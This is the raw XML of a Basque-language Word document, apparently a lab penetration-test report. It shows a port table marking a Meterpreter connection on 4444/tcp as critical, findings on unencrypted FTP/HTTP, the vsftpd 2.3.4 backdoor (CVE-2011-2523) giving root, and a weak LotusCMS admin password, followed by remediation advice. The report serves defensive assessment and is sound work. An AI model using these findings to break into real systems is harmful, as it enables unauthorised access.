          <w:tcPr>
            <w:tcW w:w="197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80/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="29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ALTUA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463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Meterpreter konexioa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971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4444/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1969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TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2957" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5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KRITIKOA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D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NFS fitxategi sistema</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="197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2049/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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NFS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="29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233D" w:rsidRDefault="003B1660">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>KRITIKOA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
      </w:pP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t>4.2 Ondorio Nagusiak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 xml:space="preserve">• FTP eta HTTP protokoloek kredentzialen transmisio </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>enkriptatu gabea egiten dute.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• vsftpd 2.3.4 bertsioak backdoor ezagun bat du (CVE-2011-2523) — root sarbidea ematen du.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• Sare berdineko edozein ekipok trafiko osoa ikusi dezake (passive sniffing).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 xml:space="preserve">• LotusCMS admin pasahitza oso ahula zen (Admin123) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>eskuz aurkitu zen.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>4.3 Gomendioak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1. FTP → SFTP/FTPS protokolora migratu (enkriptatua).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2. HTTP → HTTPS protokolora migratu (TLS/SSL).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3. vsftpd 2.3.4 eguneratu bertsio seguru batekin.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4. Pasahitz politika sendoa ezarri (konplexutasuna + luzera).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5. NFS sa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>rbidea mugatu eta root_squash aktibatu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>6. IDS/IPS sistema ezarri trafiko anomaloak detektatzeko.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E0233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70BBC64-5C1B-4DA5-A002-49B4F9D8880F}"/>
  </w:font>
  <w:font w:name="Aptos">
    <w:altName w:val="Times New Roman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EDF354DA-5AA7-46E6-924A-1851E97CA75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F406158B-4B15-4C5D-80FD-2AF2492235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9879C84-45F5-4B73-B90C-E97E6B52FC53}"/>
    <w:embedBold r:id="rId5" w:fontKey="{5B79FD28-4DE9-4B4B-8F0A-F77481C5219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8B3E362-C787-4108-B373-779CBF288F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70B97"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9E3AB44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F80E6B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5E8FCC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82F2372"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F97467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CC3349F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E0C8EC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1FF1DC1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7712928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9977067"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CD36043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AFC7C64"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A27851F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EE84606"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4D60E54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574686E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="17FC7D0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9425C08"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DE7A6B3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3E9034A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E076AF4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4B179AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4460626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4C80105"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="71AA1DF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8E121A0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F74A41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948086C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7174E84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C8850AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7A28C34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E1B14F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CAAA561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71914AB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2BC0B81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8987CA5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5492C5D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BEF2B74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="67C8B91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1152FF4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B9DA8E9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21A5A56"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B07C07C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6D174AC9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A0FA14A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0954D80"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E032679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718D7C22"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB744B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3C22CFC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D15E895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73D45728"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DF3A5BA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74DB4FF0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="03CE4C5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777463B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B646DA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7CD43181"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9B14C37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5"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="6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3D"/>
    <w:rsid w:val="003B1660"/>
    <w:rsid w:val="00E0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159B99-FCFD-4649-9BE1-C6C80F988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8945</Words>
  <Characters>49201</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>410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 Azpiazu</dc:creator>
  <cp:lastModifiedBy>Ander Azpiazu</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <cp:lastPrinted>2026-10-04T20:56:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-04T20:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-04T20:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>